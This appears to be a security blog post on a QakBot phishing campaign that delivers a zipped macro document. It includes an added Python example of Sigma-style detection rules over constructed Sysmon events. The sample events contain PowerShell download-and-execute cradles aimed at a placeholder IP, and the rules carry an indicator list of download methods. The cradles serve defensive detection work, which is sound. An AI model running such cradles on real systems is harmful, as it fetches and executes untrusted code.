The QBot banking Trojan, also known as Qakbot or Pinkslipbot, has been known to security researchers since 2008, and it keeps hitting businesses with new campaigns that demonstrate increasingly elaborate stealth capabilities.
Another phishing campaign delivering a malicious document has attracted researchers' attention. The latest QakBot attack is notable for delivering the document inside a ZIP archive rather than as a plain Microsoft Word attachment. The zipped document contains a macro that executes a PowerShell script, which in turn downloads the QakBot payload from a predefined URL.
We already warned our readers about the cunning QakBot Trojan in our Rule of the Week post: https://socprime.com/blog/rule-of-the-week-qbot-trojan-detection/
Today we want to inform you that the attackers have added two techniques to their arsenal: a bypass of CDR (content disarm and reconstruction) technology, and a bypass of detections that rely on the parent-child process pattern (an Office application spawning a script interpreter).
Osman Demir, an active participant in the Threat Bounty Developer Program, published a Sigma rule to detect the updated QakBot Trojan:
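To make the detection problem concrete, the following is an added example (it is not the rule published on SOC Prime, nor QakBot's own code). It evaluates two hypothetical Sigma-style selections over constructed Sysmon Event ID 1 (process creation) records: the first keys on the classic parent-child pattern (Office spawning PowerShell), the second keys on download-cradle strings in the PowerShell command line regardless of the parent. The field names follow Sysmon; the rule clauses, the download-cradle indicators and the sample events are assumptions made for illustration, and the "non-Office parent" record only shows why a command-line check is a useful second layer, not how QakBot actually breaks the parent-child chain.

```python
"""Sigma-style matching of the macro -> PowerShell -> download chain.

Added example, not the page's or the Threat Bounty rule. Rule logic,
indicator lists and sample events below are assumptions for illustration.
"""

# Hypothetical Sigma-like selections ("field|modifier": [values]).
# Rule 1: Office application spawning PowerShell (parent-child pattern).
OFFICE_TO_POWERSHELL = {
    "ParentImage|endswith": ["\\winword.exe", "\\excel.exe", "\\powerpnt.exe"],
    "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
}
# Rule 2: download-cradle indicators in the command line, parent-agnostic.
POWERSHELL_DOWNLOAD_CRADLE = {
    "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
    "CommandLine|contains": ["DownloadFile", "DownloadString", "Invoke-WebRequest",
                             "Net.WebClient", "Start-BitsTransfer", "http://", "https://"],
}
RULES = {"office_spawns_powershell": OFFICE_TO_POWERSHELL,
         "powershell_download_cradle": POWERSHELL_DOWNLOAD_CRADLE}


def _match_field(value: str, modifier: str, patterns: list[str]) -> bool:
    """Case-insensitive comparison, as Sigma string matching is by default."""
    v = value.lower()
    pats = [p.lower() for p in patterns]
    if modifier == "endswith":
        return any(v.endswith(p) for p in pats)
    if modifier == "contains":
        return any(p in v for p in pats)
    if modifier == "":
        return any(v == p for p in pats)
    raise ValueError(f"unsupported modifier {modifier!r}")


def selection_matches(event: dict, selection: dict) -> bool:
    """Sigma semantics: clauses in a selection AND together, values in a clause OR."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None or not _match_field(value, modifier, patterns):
            return False
    return True


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on each event."""
    hits = []
    for i, ev in enumerate(events):
        for name, sel in RULES.items():
            if selection_matches(ev, sel):
                hits.append((i, name))
    return hits


# Constructed Sysmon process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {  # macro launches PowerShell directly: both rules fire
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                       ".DownloadFile('http://203.0.113.10/doc.dat', $env:TEMP+'\\doc.exe')\"",
    },
    {  # same cradle, but no Office parent is visible: only the command-line rule fires
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -nop -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('https://203.0.113.10/x')\"",
    },
    {  # benign admin PowerShell: nothing fires
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -c Get-Service -Name Spooler",
    },
    {  # Office spawning cmd.exe: neither rule as written fires
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": "cmd /c echo hi",
    },
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The second sample record is the point: once the Office parent is no longer in the process tree, a rule that only keys on ParentImage is silent, while the command-line rule still fires. The fourth record shows the converse gap, an Office parent spawning something other than PowerShell, which neither hypothetical rule covers and which a production rule would want to include.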
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio
EDR: Carbon Black, Elastic Endpoint
Techniques: Command-Line Interface (T1059), PowerShell (T1086 in the original ATT&CK numbering, now sub-technique T1059.001), User Execution (T1204)